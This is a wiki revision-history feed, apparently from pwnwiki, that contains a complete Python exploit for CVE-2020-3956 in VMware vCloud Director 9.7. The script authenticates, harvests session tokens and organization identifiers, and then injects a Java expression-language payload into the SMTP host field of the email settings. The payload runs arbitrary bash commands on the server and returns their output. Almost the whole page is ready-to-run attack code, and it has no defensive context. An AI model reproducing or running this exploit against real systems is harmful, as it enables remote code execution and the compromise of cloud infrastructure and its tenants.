https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-3956_vCloud_Director_9.7.0.15498291_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E CVE-2020-3956 vCloud Director 9.7.0.15498291 遠程代碼執行漏洞 - Revision history 2026-04-15T23:35:04Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2020-3956_vCloud_Director_9.7.0.15498291_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1498&oldid=prev Pwnwiki: Created page with "==EXP== <pre> #!/usr/bin/python # Exploit Title: vCloud Director - Remote Code Execution # Exploit Author: Tomas Melicher # Technical Details: https://citadelo.com/en/blog/ful..." 2021-04-11T01:12:16Z <p>Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/python # Exploit Title: vCloud Director - Remote Code Execution # Exploit Author: Tomas Melicher # Technical Details: https://citadelo.com/en/blog/ful...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> #!/usr/bin/python<br /> # Exploit Title: vCloud Director - Remote Code Execution<br /> # Exploit Author: Tomas Melicher<br /> # Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/<br /> # Date: 2020-05-24<br /> # Vendor Homepage: https://www.vmware.com/<br /> # Software Link: https://www.vmware.com/products/cloud-director.html<br /> # Tested On: vCloud Director 9.7.0.15498291<br /> # Vulnerability Description: <br /> # VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.<br /> <br /> import argparse # pip install argparse<br /> import base64, os, re, requests, sys<br /> if sys.version_info &gt;= (3, 0):<br /> from urllib.parse import urlparse<br /> else:<br /> from urlparse import urlparse<br /> <br /> from requests.packages.urllib3.exceptions import InsecureRequestWarning<br /> requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br /> <br /> PAYLOAD_TEMPLATE = &quot;${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}&quot;<br /> session = requests.Session()<br /> <br /> def login(url, username, password, verbose):<br /> target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)<br /> res = session.get(target_url)<br /> match = re.search(r'tenant:([^&quot;]+)', res.content, re.IGNORECASE)<br /> if match:<br /> tenant = match.group(1)<br /> else:<br /> print('[!] can\'t find tenant identifier')<br /> return (None,None,None,None)<br /> <br /> if verbose:<br /> print('[*] tenant: %s'%(tenant))<br /> <br /> match = re.search(r'security_check\?[^&quot;]+', res.content, re.IGNORECASE)<br /> if match: # Cloud Director 9.*<br /> login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))<br /> res = session.post(login_url, data={'username':username,'password':password})<br /> if res.status_code == 401:<br /> print('[!] invalid credentials')<br /> return (None,None,None,None)<br /> else: # Cloud Director 10.*<br /> match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)<br /> if match:<br /> login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))<br /> headers = {<br /> 'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))),<br /> 'Accept': 'application/json;version=29.0',<br /> 'Content-type': 'application/json;version=29.0'<br /> }<br /> res = session.post(login_url, headers=headers)<br /> if res.status_code == 401:<br /> print('[!] invalid credentials')<br /> return (None,None,None,None)<br /> else:<br /> print('[!] url for login form was not found')<br /> return (None,None,None,None)<br /> <br /> cookies = session.cookies.get_dict()<br /> jwt = cookies['vcloud_jwt']<br /> session_id = cookies['vcloud_session_id']<br /> <br /> if verbose:<br /> print('[*] jwt token: %s'%(jwt))<br /> print('[*] session_id: %s'%(session_id))<br /> <br /> res = session.get(target_url)<br /> match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE)<br /> if match is None:<br /> print('[!] organization not found')<br /> return (None,None,None,None)<br /> organization = match.group(1)<br /> if verbose:<br /> print('[*] organization name: %s'%(organization))<br /> <br /> match = re.search(r'orgId : \'([^\']+)', res.content)<br /> if match is None:<br /> print('[!] orgId not found')<br /> return (None,None,None,None)<br /> org_id = match.group(1)<br /> if verbose:<br /> print('[*] organization identifier: %s'%(org_id))<br /> <br /> return (jwt,session_id,organization,org_id)<br /> <br /> <br /> def exploit(url, username, password, command, verbose):<br /> (jwt,session_id,organization,org_id) = login(url, username, password, verbose)<br /> if jwt is None:<br /> return<br /> <br /> headers = {<br /> 'Accept': 'application/*+xml;version=29.0',<br /> 'Authorization': 'Bearer %s'%jwt,<br /> 'x-vcloud-authorization': session_id<br /> }<br /> admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)<br /> res = session.get(admin_url, headers=headers)<br /> match = re.search(r'&lt;description&gt;\s*([^&lt;\s]+)', res.content, re.IGNORECASE)<br /> if match:<br /> version = match.group(1)<br /> if verbose:<br /> print('[*] detected version of Cloud Director: %s'%(version))<br /> else:<br /> version = None<br /> print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0')<br /> <br /> email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)<br /> <br /> payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2&gt;&amp;1'%command))<br /> data = '&lt;root:OrgEmailSettings xmlns:root=&quot;http://www.vmware.com/vcloud/v1.5&quot;&gt;&lt;root:IsDefaultSmtpServer&gt;false&lt;/root:IsDefaultSmtpServer&gt;'<br /> data += '&lt;root:IsDefaultOrgEmail&gt;true&lt;/root:IsDefaultOrgEmail&gt;&lt;root:FromEmailAddress/&gt;&lt;root:DefaultSubjectPrefix/&gt;'<br /> data += '&lt;root:IsAlertEmailToAllAdmins&gt;true&lt;/root:IsAlertEmailToAllAdmins&gt;&lt;root:AlertEmailTo/&gt;&lt;root:SmtpServerSettings&gt;'<br /> data += '&lt;root:IsUseAuthentication&gt;false&lt;/root:IsUseAuthentication&gt;&lt;root:Host&gt;%s&lt;/root:Host&gt;&lt;root:Port&gt;25&lt;/root:Port&gt;'%(payload)<br /> data += '&lt;root:Username/&gt;&lt;root:Password/&gt;&lt;/root:SmtpServerSettings&gt;&lt;/root:OrgEmailSettings&gt;'<br /> res = session.put(email_settings_url, data=data, headers=headers)<br /> match = re.search(r'value:\s*\[([^\]]+)\]', res.content)<br /> <br /> if verbose:<br /> print('')<br /> try:<br /> print(base64.b64decode(match.group(1)))<br /> except Exception:<br /> print(res.content)<br /> <br /> <br /> parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')<br /> parser.add_argument('-v', action='store_true')<br /> parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)<br /> parser.add_argument('-u', metavar='username', required=True)<br /> parser.add_argument('-p', metavar='password', required=True)<br /> parser.add_argument('-c', metavar='command', help='command to execute', default='id')<br /> args = parser.parse_args()<br /> <br /> url = urlparse(args.t)<br /> exploit(url, args.u, args.p, args.c, args.v)<br /> &lt;/pre&gt;</div> Pwnwiki